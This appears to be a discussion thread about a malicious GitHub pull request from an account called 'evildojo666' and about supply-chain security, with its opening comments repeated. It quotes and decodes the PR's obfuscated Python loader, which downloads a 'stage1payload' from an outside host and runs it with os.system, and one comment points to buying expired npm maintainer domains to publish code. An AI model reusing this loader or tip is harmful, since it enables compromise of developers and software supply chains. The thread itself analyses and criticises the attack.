GitHub repos of mine are seeing upticks in strange PRs that may be attacks. But the article's PR doesn't seem innocent at all; it's more akin to a huge dangerous red flag.
If any GitHub teammates are reading here, open source repo maintainers (including me) really need better/stronger tools for potentially risky PRs and contributors.
In order of importance IMHO:
1. Throttle PRs for new participants. For example, why is a new account able to send the same kinds of PRs to so many repos, and all at the same time?
2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
3. Create across-repo across-organization flagging for risky PRs. For example, when a repo owner sees a PR that's questionable, currently the repo owner can report it to GitHub staff but that takes quite a while; instead, what if a repo owner can flag a PR as questionable, which in turn can propagate cautionary flags on similar PRs or similar author activity?
GitHub needs to step up its security game in general. 2FA should be made mandatory. GitHub "Actions" are a catastrophe waiting to happen - very few people pin Actions to a specific commit, they use a tag of the Action that can be moved at will. A malicious author could instantaneously compromise thousands of pipelines with a single commit. Also, PR diffs often hide entire files by default - why!?!
Maybe accounts should even require ID verification. We can't afford to fuck around anymore, a significant share of the world's software supply chain lives on GitHub. It's time to take things seriously.
The rampant "@V1" usage for GitHub Actions has always been so disturbing to me. Even better is the fact that GitHub does all of the work of showing you who is actually using the action! So just compromise the account and then start searching for workflows with authenticated web tokens to AWS or something similar.
That's the second time for PyTorch, to the best of my knowledge. I know someone who found that (or something very much like it) back in 2022 and reported it, as I had to help him escalate through a relevant security contact I had at Meta.
It simply should not be allowed to do this. Nor maintain Actions without mandatory 2FA. All it takes is one account to be compromised to infect thousands of pipelines. Thousands of pipelines can be used to infect thousands of repos. Thousands of repos can be used to infect thousands of accounts... ad infinitum.
And thanks to the likes of composer and similar devs end up making non expiring tokens to reduce annoyance. There needs to be a better system. Having to manually generate a token for tooling can be a drag.
If tags are the way people want to work, then there needs to be a new repo class for actions which explicitly removes the ability to delete or force push tags across all branches. And enforced 2FA.
Using a commit hash is the second most secure option. The first (in my eyes) is vendoring the actions you want to use in your user/org's namespace. Maintaining when/if to sync or backport upstream modifications can protect against these kinds of attacks.
However, this does depend on the repo being vetted ahead of time, before being vendored.
Also the heuristic used to collapse file diffs makes it so that the most important change in a PR often can't be seen or ctrl-f'd without clicking first.
I've always considered the wider point to be that viewing diffs inline has been a laziness inducing anti-pattern in development: if you never actually bring the code to your machine, you don't quite feel like it's "real" (i.e. even if it's not a full test, compiling and running it yourself should be something which happens. If that feels uncomfortable...then maybe there's a reason).
TL;DR: Why not add a capability/permissions model to CI?
I agree that pinning commits is reasonable and that GitHub's UI and Actions system are awful. However, you said:
> Maybe accounts should even require ID verification
This would worsen the following problems:
1. GitHub actions are seen as "trustworthy"
2. GitHub actions lack granular permissions with default no
3. Rising incentives to attempt developer machine compromise, including via $5 wrench[1]
4. Risk of identity information being stolen via breach
> It's time to take things seriously.
Why not add strong capability models to CI? We have SEGFAULT for programs, right? Let's expand on the idea. Stop an action run when:
* an action attempts unexpected network access
* an action attempts IO on unexpected files or folders
The US DoD and related organizations seem to like enforcing this at the compiler level. For example, Ada's got:
* a heavily contract-based approach[2] for function preconditions
* pragma capabilities to forbid using certain features in a module
Other languages have inherited similar ideas in weaker forms, and I mean more than just Rust's borrow checker. Even C# requires explicit declaration to accept null values as arguments [3].
Some languages are taking a stronger approach. For example, Gren's[4] developers are considering the following for IO:
1. you need to have permission to access the disk and other devices
2. permissions default to no
> We can't afford to fuck around anymore,
Sadly, the "industry" seems to disagree with us here. Do you remember when:
1. Microsoft tried to ship 99% of a credit card number and SSN exfiltration tool[5] as a core OS component?
2. BSoD-as-service stopped global air travel?
It seems like a great time to be selling better CI solutions. ¯\_(ツ)_/¯
> 2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
Just do a blue checkmark thing by tying the account to real-world identity (eIDAS etc). It's not rocket science, there are gazillion providers that offer these sort of id checks as service, GH would just need to integrate it.
No, this is the exact opposite of what we want. Ability to maintain pseudoanonymity for maintainers and contributors is paramount for personal safety. We mist be able to keep online and meat space personas separate without compromising security of software.
Stay wary of Worldcoin as the supposed fix for this.
>>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,10,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,112,111\
,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101 ,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,117,101,115,11\
6,46,117,114,108,111,112,101,110,40,34,104,116,116,112,115,58,47,47,119,119,119,46,101, 118,105,108,100,111,106,111,46,99,111,109,47,11\
5,116,97,103,101,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,101,97,100,40,41,10,122,32,61,32,121,4,6,100,101,99,111,\
00,101,40,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,111,115,46,115,121,115,116,101,109,40,122,411,10])
There are countless people who can do that and don't. There are almost certainly many people actively doing it still today. Thinking that the xz attack was extraordinary or difficult is a very big mistake.
It's news cycle should have conveyed a sense of "oh shit, we really do need to be watching for discretely malicious contributors" not "whoa, I can't believe there was someone capable of that!" -- it seems like you learned the wrong lesson.
I came to the realization over a year ago, that the only thing needed to be an "Advanced persistent threat" is an attention span. Not even a long one.
Judging how many drive by's a random ipv4 address gets on aws, gcp, azure, or vultr- they get ignored if they get it wrong, and nobody notices until too late if they get it right.
Well, the other take-away is that if somebody can put in the work to do that to hopefully get included into a linux distro; what are they doing to get included into MacOS / Windows?
Not unique. Bitcoins were stolen with a similar technique of highjacking a js dependency of some bitcoin wallet app. It was done by doing proper contributions at first to gain control of the thing.
They were even better, the library behaved completely normal when used anywhere else.
I mean, just look at https://milksad.info for what some argue is a very long game supply chain attack. Intentionally bad entropy in the tool recommended in Mastering Bitcoin
Most of the time you can just buy an expired domain name tied to a js include or dependency maintainer email address and you now have arguably -legal- ability to publish any code you want to thousands of orgs.
Plenty of expired npm maintainer email domains right now. Have fun.
I have done it twice to bring exposure to the issue. Seemingly no one cares enough to do the most basic things like code signing.
You need ability, means (as in -- have the money to spend time on it), and motive. Many people have the ability. Many people have the means. (And there is some overlap, but the overlap isn't that large.) Few people have the motive.
The combination of all three tends to mostly appear in nation states. They have the motive, and they have the money to fund people with the ability to pull off this kind of attack.
Exactly, most of us need to work and aren't motivated enough to spend our free time committing crimes. I also assume this is full time work. From my limited perspective the hardest part was the time investment and gaining enough trust to put the code into action.
It's so ham-handed that it reminds me of typical phishing emails, which are supposedly full of misspellings to filter out recipients who notice misspellings and aren't worth the trouble to try to scam.
Maybe it's the hacking equivalent of Schrödinger's douchebag? If the hacking attempt succeeds, then you've achieved your goal. If it fails then you obviously joking or doing "research."
Note that if you have self-hosted runner and if some of the environment variable or state of execution are carried over between runs - you should not even reply or comment on any malicious PR.. The reason is - if they have pull_request_review_comment action workflow inside the fork...
well guess what? it bypasses even your "Require approval for all outside collaborators" flag in your repo setting and trigger it on your self-hosted runner anyway...
For those who don't get the reference, there was an incident where security research by University of Minnesota students/professors was conducted without communicating or receiving permission from anyone on the Linux side or from the Institutional Review Board (IRB).
It raised a lot of questions about conducting ethical security research on open source projects, whether security research of this nature counts as an "experiment on people" (which has a lot more scrutiny, obviously), etc.
"[...] Lu and Wu explained that they’d been able to introduce vulnerabilities into the Linux kernel by submitting patches that appeared to fix real bugs but also introduced serious problems."
I think it looks like someone just ham fisting a known vulnerability trying to find one sucker who doesn't know what he's doing. If you're a jr with a learning projects maybe you'd approve the merge.
Another vulnerability of the GitHub monoculture. Attackers wanting to automate attempts to subvert open-source projects only have to focus on one system.
The hardcover edition of Jurassic Park explained, including screenshots of his IDE, how Dennis Nedry managed to shut off the park security: by disguising a call to the "turn off the fences" code as an innocuous object constructor.
I've heard from Hackernews who read the book and didn't see the IDE screenshots. Maybe the paperback didn't have them.
GitHub repos of mine are seeing upticks in strange PRs that may be attacks. But the article's PR doesn't seem innocent at all; it's more akin to a huge dangerous red flag.
If any GitHub teammates are reading here, open source repo maintainers (including me) really need better/stronger tools for potentially risky PRs and contributors.
In order of importance IMHO:
1. Throttle PRs for new participants. For example, why is a new account able to send the same kinds of PRs to so many repos, and all at the same time?
2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
3. Create across-repo across-organization flagging for risky PRs. For example, when a repo owner sees a PR that's questionable, currently the repo owner can report it to GitHub staff but that takes quite a while; instead, what if a repo owner can flag a PR as questionable, which in turn can propagate cautionary flags on similar PRs or similar author activity?
GitHub needs to step up its security game in general. 2FA should be made mandatory. GitHub "Actions" are a catastrophe waiting to happen - very few people pin Actions to a specific commit, they use a tag of the Action that can be moved at will. A malicious author could instantaneously compromise thousands of pipelines with a single commit. Also, PR diffs often hide entire files by default - why!?!
Maybe accounts should even require ID verification. We can't afford to fuck around anymore, a significant share of the world's software supply chain lives on GitHub. It's time to take things seriously.
The rampant "@V1" usage for GitHub Actions has always been so disturbing to me. Even better is the fact that GitHub does all of the work of showing you who is actually using the action! So just compromise the account and then start searching for workflows with authenticated web tokens to AWS or something similar.
It's probably already happening.
Not that long ago Facebook was accidentally leaking information through their self hosted runners, through a very common mistake people make. https://johnstawinski.com/2024/01/11/playing-with-fire-how-w...
That's the second time for PyTorch, to the best of my knowledge. I know someone who found that (or something very much like it) back in 2022 and reported it, as I had to help him escalate through a relevant security contact I had at Meta.
Exactly.
It simply should not be allowed to do this. Nor maintain Actions without mandatory 2FA. All it takes is one account to be compromised to infect thousands of pipelines. Thousands of pipelines can be used to infect thousands of repos. Thousands of repos can be used to infect thousands of accounts... ad infinitum.
2FA matters very little when you have never expiring tokens.
2FA also matters little if the attacker has compromised your machine. They can use your 2FA-authenticated session.
Only once… but if they can get your forever token… that's not the same.
Once is enough.
And thanks to the likes of composer and similar devs end up making non expiring tokens to reduce annoyance. There needs to be a better system. Having to manually generate a token for tooling can be a drag.
GitHub specifically recommended that you have a v1, v1.x and v1.x.x
When you go from v1.5.3 to v1.5.4 you make v1.5 and v1 point to v1.5.4
The point is that any of those tags can be replaced maliciously, after the fact.
Sorry I followed up to this point - how can this be done?
If tags are the way people want to work, then there needs to be a new repo class for actions which explicitly removes the ability to delete or force push tags across all branches. And enforced 2FA.
Using a commit hash is the second most secure option. The first (in my eyes) is vendoring the actions you want to use in your user/org's namespace. Maintaining when/if to sync or backport upstream modifications can protect against these kinds of attacks.
However, this does depend on the repo being vetted ahead of time, before being vendored.
Also the heuristic used to collapse file diffs makes it so that the most important change in a PR often can't be seen or ctrl-f'd without clicking first.
Blame it on go dependency lists and similar.
What do you even review when it's one of those? There's thousands of lines changed and they all point to commits on other repositories.
You're essentially hoping it's fine.
Shipping code to production without evidence anyone credible has reviewed it at a minimum is negligence.
You're claiming here that you do a review of all of your dependencies?
I've always considered the wider point to be that viewing diffs inline has been a laziness inducing anti-pattern in development: if you never actually bring the code to your machine, you don't quite feel like it's "real" (i.e. even if it's not a full test, compiling and running it yourself should be something which happens. If that feels uncomfortable...then maybe there's a reason).
And even if you pin your actions, if they're docker actions they can replace the docker container that is at that label:
https://github.com/rust-build/rust-build.action/blob/59be2ed...
2FA is already mandatory on GitHub.
Seems I missed that change, thanks.
It only happened in the last month or so I think.
Nah. A year maybe?
What's next, checking that Releases match the code on Github?
With what, a reproducible build? Madness! Madness I say!
Having a reproducible build does not prove that the tarball contains the same source as git.
SLSA aims to achieve this, though, right? Specifically going from level 2 to level 3.
TL;DR: Why not add a capability/permissions model to CI?
I agree that pinning commits is reasonable and that GitHub's UI and Actions system are awful. However, you said:
> Maybe accounts should even require ID verification
This would worsen the following problems:
1. GitHub actions are seen as "trustworthy"
2. GitHub actions lack granular permissions with default no
3. Rising incentives to attempt developer machine compromise, including via $5 wrench[1]
4. Risk of identity information being stolen via breach
> It's time to take things seriously.
Why not add strong capability models to CI? We have SEGFAULT for programs, right? Let's expand on the idea. Stop an action run when:
* an action attempts unexpected network access
* an action attempts IO on unexpected files or folders
The US DoD and related organizations seem to like enforcing this at the compiler level. For example, Ada's got:
* a heavily contract-based approach[2] for function preconditions
* pragma capabilities to forbid using certain features in a module
Other languages have inherited similar ideas in weaker forms, and I mean more than just Rust's borrow checker. Even C# requires explicit declaration to accept null values as arguments [3].
Some languages are taking a stronger approach. For example, Gren's[4] developers are considering the following for IO:
1. you need to have permission to access the disk and other devices
2. permissions default to no
> We can't afford to fuck around anymore,
Sadly, the "industry" seems to disagree with us here. Do you remember when:
1. Microsoft tried to ship 99% of a credit card number and SSN exfiltration tool[5] as a core OS component?
2. BSoD-as-service stopped global air travel?
It seems like a great time to be selling better CI solutions. ¯\_(ツ)_/¯
[1]: https://xkcd.com/538/
[2]: https://learn.adacore.com/courses/intro-to-ada/chapters/cont...
[3]: https://learn.microsoft.com/en-us/dotnet/csharp/language-ref...
[4]: https://gren-lang.org/
[5]: https://arstechnica.com/ai/2024/06/windows-recall-demands-an...
When I saw the screenshot I almost laughed out loud at the thought that anyone would say this is innocent looking.
It looked like a PR stunt
Yeah, the guy is literally named evildojo.
And then a 666 to boot, I mean gosh. Bad news.
But github gets an higher evaluation having X amount of active users. The last thing they want is to make that number drop!
By the way on gh you can also buy stars for your project from fake accounts.
> 2. Help a repo owner confirm that a new PR author is human and legit. For example, when a PR author submits their first PR to a repo, can the repo automatically do some kind of challenge such as a captcha prompt, or email confirmation, or multi-factor authentication, etc.?
Just do a blue checkmark thing by tying the account to real-world identity (eIDAS etc). It's not rocket science, there are gazillion providers that offer these sort of id checks as service, GH would just need to integrate it.
No, this is the exact opposite of what we want. Ability to maintain pseudoanonymity for maintainers and contributors is paramount for personal safety. We mist be able to keep online and meat space personas separate without compromising security of software. Stay wary of Worldcoin as the supposed fix for this.
Ah yes I'm sure it's completely impossible to game these services by printing a fake id at home and showing it on the webcam /s
Step 1: Automatically reject PRs from usernames like "evildojo666"
Your username would suffer from this policy, as would anyone describing themselves as a hacker.
Why though
It's someone attempting to setup/frame someone else
https://x.com/vxunderground/status/1856450468945506615
https://x.com/evildojo666/status/1856413636748562827
That makes a lot more sense than the headline. It doesn't look like a serious attempt and is not well obfuscated.
triple false-flags to sow/reap FUD
How is that innocent looking? exec(''.join(chr(x) for x in [...])) stands out like a sore thumb.
The username is literally "evildojo666"
It's not, I think the headline is for clicks and engagement.
Looks like he accidentally added a file. It's not "innocent" but definitely disguised by appearing as a readme only change
Even the PR is described as just a docs change
No injection here, purely functional programming
The code in question:
>>> ''.join(chr(x) for x in [105,109,112,111,114,116,32,111,115,10,105,109,112,111,114,116,32,117,114,108,108,105,98,10,105,109,112,111\ ,114,116,32,117,114,108,108,105,98,46,114,101,113,117,101 ,115,116,10,120,32,61,32,117,114,108,108,105,98,46,114,101,113,117,101,115,11\ 6,46,117,114,108,111,112,101,110,40,34,104,116,116,112,115,58,47,47,119,119,119,46,101, 118,105,108,100,111,106,111,46,99,111,109,47,11\ 5,116,97,103,101,49,112,97,121,108,111,97,100,34,41,10,121,32,61,32,120,46,114,101,97,100,40,41,10,122,32,61,32,121,4,6,100,101,99,111,\ 00,101,40,34,117,116,102,56,34,41,10,120,46,99,108,111,115,101,40,41,10,111,115,46,115,121,115,116,101,109,40,122,411,10])
'import os\nimport urllib\nimport urllib.request\nx = urllib.request.urlopen("https://www.evildojo.com/stage1payload")\ny = x.read()\nz = y\x04\x06decode("utf8")\nx.close()\nos.system(z)\n'
You ever get offended that the attacker is so obviously incompetent? At least put in the work like the xz attacker.
> At least put in the work like the xz attacker.
There are very few people who can do that.
There are countless people who can do that and don't. There are almost certainly many people actively doing it still today. Thinking that the xz attack was extraordinary or difficult is a very big mistake.
It's news cycle should have conveyed a sense of "oh shit, we really do need to be watching for discretely malicious contributors" not "whoa, I can't believe there was someone capable of that!" -- it seems like you learned the wrong lesson.
I came to the realization over a year ago, that the only thing needed to be an "Advanced persistent threat" is an attention span. Not even a long one.
Judging how many drive by's a random ipv4 address gets on aws, gcp, azure, or vultr- they get ignored if they get it wrong, and nobody notices until too late if they get it right.
Well, the other take-away is that if somebody can put in the work to do that to hopefully get included into a linux distro; what are they doing to get included into MacOS / Windows?
Well linux distributions can be installed on windows so…
They were targeting OpenSSH servers, not desktops.
I mean people often use desktops to connect to servers.
It's akin to putting an exploit into say some security software. It's probably going to have access to something you care about.
> There are very few people who can do that
you’re right. What made the XZ attacker rather unique is the fact they made useful contributions at first and only turned nasty later on.
Not many people can keep a malicious campaign going on as long as the XZ attacker did which is why it’s suspected to be a nation-backed attack
Not unique. Bitcoins were stolen with a similar technique of highjacking a js dependency of some bitcoin wallet app. It was done by doing proper contributions at first to gain control of the thing.
They were even better, the library behaved completely normal when used anywhere else.
xz was found because it behaved differently.
I mean, just look at https://milksad.info for what some argue is a very long game supply chain attack. Intentionally bad entropy in the tool recommended in Mastering Bitcoin
There are many people who could pull off an attack like that if they were so inclined.
Most of the time you can just buy an expired domain name tied to a js include or dependency maintainer email address and you now have arguably -legal- ability to publish any code you want to thousands of orgs.
Plenty of expired npm maintainer email domains right now. Have fun.
I have done it twice to bring exposure to the issue. Seemingly no one cares enough to do the most basic things like code signing.
You need ability, means (as in -- have the money to spend time on it), and motive. Many people have the ability. Many people have the means. (And there is some overlap, but the overlap isn't that large.) Few people have the motive.
The combination of all three tends to mostly appear in nation states. They have the motive, and they have the money to fund people with the ability to pull off this kind of attack.
Exactly, most of us need to work and aren't motivated enough to spend our free time committing crimes. I also assume this is full time work. From my limited perspective the hardest part was the time investment and gaining enough trust to put the code into action.
...and the ones who truly can, won't be noticed.
I like how it both indicates that it's evil and that it's a first-stage malicious payload. Very informative.
Did anyone download the payload before it 404'd?
I don't think it ever existed. According to the owner of the site anyway.
That seems pretty clumsy. Even a first year employee would catch that in a code review.
Not sure how hte OP describes that as innocent looking.
obfuscated code, check
use of eval, check
How was that innocent looking?
Related. Others?
Threat actor attempted to slipstream a malware payload into yt-dlp's GitHub repo - https://news.ycombinator.com/item?id=42121969 - Nov 2024 (5 comments)
The recently famous one is the XZ Tools takeover...
https://en.wikipedia.org/wiki/XZ_Utils_backdoor
It's so ham-handed that it reminds me of typical phishing emails, which are supposedly full of misspellings to filter out recipients who notice misspellings and aren't worth the trouble to try to scam.
Maybe it's the hacking equivalent of Schrödinger's douchebag? If the hacking attempt succeeds, then you've achieved your goal. If it fails then you obviously joking or doing "research."
Note that if you have self-hosted runner and if some of the environment variable or state of execution are carried over between runs - you should not even reply or comment on any malicious PR.. The reason is - if they have pull_request_review_comment action workflow inside the fork...
well guess what? it bypasses even your "Require approval for all outside collaborators" flag in your repo setting and trigger it on your self-hosted runner anyway...
This was brought up in recent BlackHat24:
https://github.com/AdnaneKhan/ConferenceTalks/blob/main/Blac...
And yes - it's another "Github won't fix"
It’s not even subtle. How crude. I guess even the state govs are outsourcing their work to script kiddies
lol this is a troll by someone who hates someone else and is setting them up.
Zero nation-states are involved in this.
Did I miss the evidence that this is state-backed?
This account was spamming Python repositories with the same type of low value obvious backdoor spam.[1]
Full list of attempted pull requests (all deleted seemingly by GitHub):
[1] https://play.clickhouse.com/play?user=play#U0VMRUNUICogRlJPT...University of Minnesota at it again?
For those who don't get the reference, there was an incident where security research by University of Minnesota students/professors was conducted without communicating or receiving permission from anyone on the Linux side or from the Institutional Review Board (IRB).
It raised a lot of questions about conducting ethical security research on open source projects, whether security research of this nature counts as an "experiment on people" (which has a lot more scrutiny, obviously), etc.
"[...] Lu and Wu explained that they’d been able to introduce vulnerabilities into the Linux kernel by submitting patches that appeared to fix real bugs but also introduced serious problems."
https://cse.umn.edu/cs/linux-incident
https://www.theverge.com/2021/4/30/22410164/linux-kernel-uni...
Yes, really looks like someone conducting a study, or someone who wants to call out projects for their sloppy PR reviews.
I think it looks like someone just ham fisting a known vulnerability trying to find one sucker who doesn't know what he's doing. If you're a jr with a learning projects maybe you'd approve the merge.
I moved to codeberg and there's nothing of the sort going on there. Quite relaxing.
On github I did get weird and suspicious contributions.
Can't help but wonder... did anyone bite?
Review all code you ship to production or get burned. Every single dependency.
Security is expensive. Pay for it now or pay more later.
Et tu evildojo666?
Title is misleading, it's an exec that's not hidden in any way.
Another vulnerability of the GitHub monoculture. Attackers wanting to automate attempts to subvert open-source projects only have to focus on one system.
The hardcover edition of Jurassic Park explained, including screenshots of his IDE, how Dennis Nedry managed to shut off the park security: by disguising a call to the "turn off the fences" code as an innocuous object constructor.
I've heard from Hackernews who read the book and didn't see the IDE screenshots. Maybe the paperback didn't have them.
banned
https://github.com/evildojo666
will next account be 667?
anyone who does not review patches before accepting them deservers to suffer consequences of their laziness.
And what do the people who are actively trying to sabotage repos deserve?